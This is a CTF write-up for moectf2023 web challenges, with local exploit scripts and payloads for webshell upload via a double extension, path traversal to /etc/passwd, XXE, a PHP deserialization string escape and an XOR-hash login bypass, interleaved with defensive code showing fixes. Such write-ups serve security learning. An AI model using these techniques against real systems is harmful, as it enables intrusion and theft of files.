moectf2023 web wp

gas!gas!gas!

Just run the script:

import requests

session = requests.Session()
url = "http://127.0.0.1:14447"
steering_control = 0   # updated from the hint: 右 -> -1, 直行 -> 0, 左 -> 1
throttle = 1           # updated from the hint: 小 -> 0, 保持 -> 1, 大 -> 2

for i in range(10):
    datas = {"driver": 1, "steering_control": steering_control, "throttle": throttle}
    print(datas)
    data = session.post(url, data=datas)
    try:
        # the next driving instruction is the text inside the red <font> tag
        hint = data.text.split('<font color="red">')[1].split("</font>")[0]
    except IndexError:
        # no instruction in the response (final page or an error): show it and stop
        print(data.text)
        break
    if hint.find("右") > -1:      # right
        steering_control = -1
    if hint.find("直行") > -1:    # straight ahead
        steering_control = 0
    if hint.find("左") > -1:      # left
        steering_control = 1
    if hint.find("小") > -1:      # slow down
        throttle = 0
    if hint.find("保持") > -1:    # keep speed
        throttle = 1
    if hint.find("大") > -1:      # speed up
        throttle = 2
    print(hint)

moe图床 (moe image host)

Start by uploading an arbitrary PNG file that contains a one-line webshell (一句话木马).

Look at the front-end code

and notice that there is an upload.php.

It only takes the first extension, so we can try constructing the filename 1.png.php.

Then connect with AntSword (蚁剑).
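The bypass works because the check looks at the first extension in the name. As an added example (not the challenge's code), here is that weak check reconstructed from the description above, next to a stricter version that validates the last extension against an allowlist, confirms the file's magic bytes match that type, and stores the upload under a server-generated name. The allowlist, the magic values and the `weak_check` reconstruction are assumptions; the sample PNG body is constructed.

```python
import os
import secrets

# Allowlist of image extensions and the leading bytes each format must start with.
ALLOWED = {"png", "jpg", "jpeg", "gif"}
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def weak_check(filename: str) -> bool:
    """Reconstruction of the flawed logic: only the FIRST extension is examined,
    so "1.png.php" is accepted because its first extension is "png"."""
    parts = filename.split(".")
    return len(parts) > 1 and parts[1].lower() in ALLOWED


def strict_check(filename: str, content: bytes) -> bool:
    """Validate the LAST extension against the allowlist and require the content
    to start with the magic bytes of that format."""
    base = os.path.basename(filename)        # ignore any directory part
    if "." not in base or base.startswith("."):
        return False
    ext = base.rsplit(".", 1)[1].lower()     # the last extension decides the type
    if ext not in ALLOWED:
        return False
    return content.startswith(MAGIC[ext])


def stored_name(filename: str, content: bytes) -> str:
    """Name to store the upload under: random, keeping only the validated extension,
    so the client never controls the final filename or its extension."""
    if not strict_check(filename, content):
        raise ValueError("upload rejected")
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png = MAGIC["png"] + b"\x00" * 16        # constructed stand-in for a PNG body
    print("weak   1.png.php:", weak_check("1.png.php"))         # True: bypassed
    print("strict 1.png.php:", strict_check("1.png.php", png))  # False: last ext is php
    print("strict cat.png  :", strict_check("cat.png", png))    # True
    print("stored as       :", stored_name("cat.png", png))
```

The magic-byte check alone does not make an upload safe (a valid image can still carry text that a misconfigured server would execute); the decisive controls are the last-extension allowlist and the server-chosen filename, ideally with the upload directory served without script execution.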

meo图床 (meo image host)

Upload an image first and observe that the name parameter is used to decide where the file is stored. Test whether it is vulnerable to path traversal.

It turns out /etc/passwd can be read.

Try reading /flag.

That is the breakthrough.
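The root cause here is that the name parameter is joined into a filesystem path without being confined to the upload directory. As an added example (not the challenge's code), the following shows how a server can confine a client-supplied name to one directory: canonicalize the joined path and check that it is still below the root. The upload root path is an assumption, and the sample names in the main block are constructed.

```python
import os

UPLOAD_ROOT = "/var/www/uploads"   # assumed upload directory


def resolve_upload_path(name: str, root: str = UPLOAD_ROOT) -> str:
    """Return the absolute path where `name` would be stored inside `root`,
    or raise ValueError if the request would land outside that directory."""
    if "\x00" in name:
        raise ValueError("NUL byte in name")
    root_abs = os.path.realpath(root)
    # realpath collapses "..", "." and symlinks. An absolute `name` makes
    # os.path.join discard `root`, which the containment check catches as well.
    candidate = os.path.realpath(os.path.join(root_abs, name))
    if candidate == root_abs or os.path.commonpath([root_abs, candidate]) != root_abs:
        raise ValueError(f"path escapes upload root: {name!r}")
    return candidate


def is_safe_name(name: str, root: str = UPLOAD_ROOT) -> bool:
    """True when `name` resolves to a file inside `root`."""
    try:
        resolve_upload_path(name, root)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    for n in ["avatar.png", "../../etc/passwd", "/flag", "sub/../../flag", "", "a\x00.png"]:
        print(f"{n!r:22} -> {'ok' if is_safe_name(n) else 'rejected'}")
```

Checking the canonical path (rather than filtering the string for `..`) also covers encoded or mixed separators once the framework has decoded them, and an existing symlink inside the upload directory that points elsewhere.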

大海捞针 (needle in a haystack)

Use /?id=1 and brute-force the id value.

了解你的座驾 (know your ride)

Capture the request first.

URL-decoding gives xml_content=XDU moeCTF Flag.

This can be identified as an XXE vulnerability.

Then URL-encode it again.

moectf{DO-Y0u-lIk3-the_xXE_VUlHuB-phP-tO_Get_Flag_@fTEr_G@Sgasgas0}
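The service above accepts raw XML in xml_content and parses it with entity declarations honoured, which is what makes the XXE possible. As an added example (not the challenge's code), this is how the receiving side could handle such a parameter: refuse any document that carries a DOCTYPE or ENTITY declaration, then parse with external general entities explicitly disabled. The document layout (a `<name>` element) and both sample documents are constructed assumptions.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Constructed sample documents (not captured from the challenge). The first is what
# a normal client might send; the second declares an external entity.
BENIGN = b'<?xml version="1.0"?><root><name>XDU moeCTF Flag</name></root>'
MALICIOUS = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE root [<!ENTITY ext SYSTEM "http://example.invalid/entity">]>'
    b"<root><name>&ext;</name></root>"
)

DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def has_dtd(document: bytes) -> bool:
    """First gate: a service that never expects a DTD can refuse one outright."""
    return DTD_MARKER.search(document) is not None


class NameCollector(ContentHandler):
    """Collects the text of the <name> element."""

    def __init__(self):
        super().__init__()
        self.in_name = False
        self.name = ""

    def startElement(self, tag, attrs):
        self.in_name = tag == "name"

    def endElement(self, tag):
        self.in_name = False

    def characters(self, text):
        if self.in_name:
            self.name += text


def extract_name(document: bytes) -> str:
    """Parse untrusted XML: refuse DTDs, and keep external general entities off
    so that an entity that slipped past the first gate is still never fetched."""
    if has_dtd(document):
        raise ValueError("DOCTYPE/ENTITY declarations are not accepted")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    handler = NameCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return handler.name


def is_rejected(document: bytes) -> bool:
    """True when the document is refused before any entity could be resolved."""
    try:
        extract_name(document)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print(extract_name(BENIGN))     # XDU moeCTF Flag
    print(is_rejected(MALICIOUS))   # True
```

Since Python 3.7.1 the SAX parser already leaves external general entities off by default, so the `setFeature` call mainly makes the intent explicit; the DOCTYPE rejection is the cheaper first gate and also blocks entity-expansion (billion laughs) documents that need no external fetch at all.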

夺命十三枪 (thirteen deadly spear strikes)

We find require_once('Hanxin.exe.php'); so go straight to /Hanxin.exe.php.

From the code audit, we need to change $Spear_Owner = 'Nobody'; to MaoLei.

We also already know that the current serialized payload is O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:15:"夺命十三枪";s:11:"Spear_Owner";s:6:"Nobody";}

We notice a str_replace and guess this is a deserialization string escape; the part to escape is ";s:11:"Spear_Owner";s:6:"MaoLei";}

So the payload is:

?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

moectf{PhP_UnsErI@1_coDE-I5_w3LC0me-@Nd_yOU-shoU1D_eScAPe_from_the_filter0}
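The escape works because str_replace runs over the already-serialized string: every hit makes the text longer while the byte-length prefix recorded for Chant stays the same, so the bytes after that length are parsed as further properties and the original tail becomes ignored trailing data. As an added example (not the challenge's PHP), the following Python re-creates just enough of PHP's serialize/unserialize format to show the effect and the fix of filtering the field value before it is serialized. The replacement string in FILTER is hypothetical; the writeup does not show the challenge's real table, only that seven hits must add exactly the 35 bytes of the injected tail. The class name and the payload are the writeup's own.

```python
from dataclasses import dataclass

CLASS = "Omg_It_Is_So_Cool_Bring_Me_My_Flag"

# Hypothetical filter table: the real replacement strings are not in the writeup.
# Each hit grows the text by 5 bytes, so the 7 hits in the payload add exactly the
# 35 bytes of the injected tail.
FILTER = {"di_qi_qiang": "di_qi_qiangXXXXX"}

# The writeup's payload: 7 * "di_qi_qiang" followed by the part that gets "escaped".
PAYLOAD = "di_qi_qiang" * 7 + '";s:11:"Spear_Owner";s:6:"MaoLei";}'


@dataclass
class PhpObject:
    name: str
    props: dict


def str_replace(text: str) -> str:
    for old, new in FILTER.items():
        text = text.replace(old, new)
    return text


def _ser_str(s: str) -> bytes:
    raw = s.encode()                       # PHP counts bytes, not characters
    return b's:%d:"%s";' % (len(raw), raw)


def php_serialize(obj: PhpObject) -> bytes:
    """Subset of PHP serialize(): objects whose properties are strings."""
    cls = obj.name.encode()
    body = b"".join(_ser_str(k) + _ser_str(v) for k, v in obj.props.items())
    return b'O:%d:"%s":%d:{%s}' % (len(cls), cls, len(obj.props), body)


def _parse(data: bytes, pos: int):
    tag = data[pos:pos + 1]
    if tag == b"s":                        # s:<len>:"<bytes>";
        colon = data.index(b":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                  # skip ':"'
        raw = data[start:start + length]   # trusts the declared length blindly
        if data[start + length:start + length + 2] != b'";':
            raise ValueError("string length does not match its data")
        return raw.decode(), start + length + 2
    if tag == b"O":                        # O:<len>:"<class>":<n>:{<key><value>...}
        colon = data.index(b":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len].decode()
        p = colon + 2 + name_len + 2       # skip '":'
        colon2 = data.index(b":", p)
        count = int(data[p:colon2])
        p = colon2 + 2                     # skip ':{'
        props = {}
        for _ in range(count):
            key, p = _parse(data, p)
            value, p = _parse(data, p)
            props[key] = value
        if data[p:p + 1] != b"}":
            raise ValueError("unterminated object")
        return PhpObject(name, props), p + 1
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")


def php_unserialize(data: bytes) -> PhpObject:
    """Like PHP, stops after the first complete value and ignores trailing bytes."""
    value, _ = _parse(data, 0)
    return value


def store_then_filter(chant: str) -> PhpObject:
    """Vulnerable order: serialize first, then str_replace over the serialized text."""
    obj = PhpObject(CLASS, {"Chant": chant, "Spear_Owner": "Nobody"})
    tainted = str_replace(php_serialize(obj).decode())
    return php_unserialize(tainted.encode())


def filter_then_store(chant: str) -> PhpObject:
    """Fixed order: filter the field value, then serialize; the length prefix
    is computed from the final value, so nothing can spill out of the string."""
    obj = PhpObject(CLASS, {"Chant": str_replace(chant), "Spear_Owner": "Nobody"})
    return php_unserialize(php_serialize(obj))


if __name__ == "__main__":
    print(php_serialize(PhpObject(CLASS, {"Chant": "夺命十三枪", "Spear_Owner": "Nobody"})).decode())
    print("vulnerable order ->", store_then_filter(PAYLOAD).props["Spear_Owner"])  # MaoLei
    print("fixed order      ->", filter_then_store(PAYLOAD).props["Spear_Owner"])  # Nobody
```

The first print reproduces the writeup's original serialized string byte for byte, which is the easiest way to confirm the mini-serializer matches PHP's layout. The general rule the fix illustrates is that any transformation of user data must happen before serialization, never on the serialized text, and that unserialize should not run on client-controlled input in the first place.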

signin

assert users["admin"] == "admin"
users contains the username "admin" with password "admin"; on the surface it looks as if the submitted parameters also have to be admin/admin.

Continuing through the source, we find an eval() statement that overwrites base64.b64encode with base64.b64decode.

import hashlib

# salt is defined elsewhere in the challenge source (a server-side secret)
def gethash(*items):
    c = 0
    for item in items:
        if item is None:
            continue
        c ^= int.from_bytes(hashlib.md5(f"{salt}[{item}]{salt}".encode()).digest(), "big") # it looks so complex! but is it safe enough?
    return hex(c)[2:]

When two items are passed, this function amounts to XORing the two per-item digests and returning the result, so whenever the two parameters are equal the return value is 0, whatever the parameter is.

There are two filters on the submitted parameters: username must not equal "admin", and username must not equal password. Getting the flag requires the hashed value to be 0. How can that be achieved?
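The weakness is that gethash combines independent per-field digests with XOR, so any two fields that format to the same text cancel to 0, and the order of the fields does not matter either. As an added example (not the challenge's code), the same construction is shown beside a replacement that binds each field's position and type into one keyed digest. The salt value is a constructed stand-in for the server-side one, and the fixed variant is a suggestion rather than anything from the challenge.

```python
import hashlib
import hmac
import json

SALT = "constructed-demo-salt"   # the challenge's real salt is server-side and not shown


def gethash_weak(*items) -> str:
    """Same construction as the challenge: XOR of per-item MD5 digests."""
    c = 0
    for item in items:
        if item is None:
            continue
        c ^= int.from_bytes(hashlib.md5(f"{SALT}[{item}]{SALT}".encode()).digest(), "big")
    return hex(c)[2:]


def gethash_fixed(*items) -> str:
    """Bind every field together with its position and type in one keyed digest.
    Equal fields no longer cancel, and swapping fields changes the result."""
    canonical = json.dumps(
        [None if item is None else [type(item).__name__, str(item)] for item in items],
        separators=(",", ":"),
    )
    return hmac.new(SALT.encode(), canonical.encode(), hashlib.sha256).hexdigest()


if __name__ == "__main__":
    # "1" (str) and 1 (int) pass a username != password check but format identically
    print(gethash_weak("1", 1))                               # 0
    print(gethash_weak("admin", "admin"))                     # 0
    print(gethash_weak("a", "b") == gethash_weak("b", "a"))   # True: order-blind
    print(gethash_fixed("1", 1) == gethash_fixed(1, "1"))     # False
```

The str/int pair is exactly what the script below relies on: the equality filter compares Python values, while gethash compares their formatted text. A keyed digest over a canonical encoding removes both the cancellation and the order-independence, and the type tag removes the str/int ambiguity.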

Next, write a script that base64-encodes the constructed JSON data five times.

import requests
import base64

url = "http://localhost:64817/login"
username = "\"1\""   # JSON string "1"
password = "1"       # JSON number 1: not equal to the string for the username != password
                     # filter, but formats to the same "1" inside gethash, so the digests cancel
jsondata = "{\"username\":"+f"{username}"+",\"password\":"+f"{password}"+"}"
print(f"{jsondata = }")
for _ in range(5):   # base64-encode five times
    jsondata = base64.b64encode(str(jsondata).encode()).decode()
data = "{\"params\":\""+f"{jsondata}\""+"}"
print(f"{data = }")
req = requests.post(url=url, data=data).text
print(f"{req = }")
Posted @ 2025-01-08 10:09 by dynasty_chenzi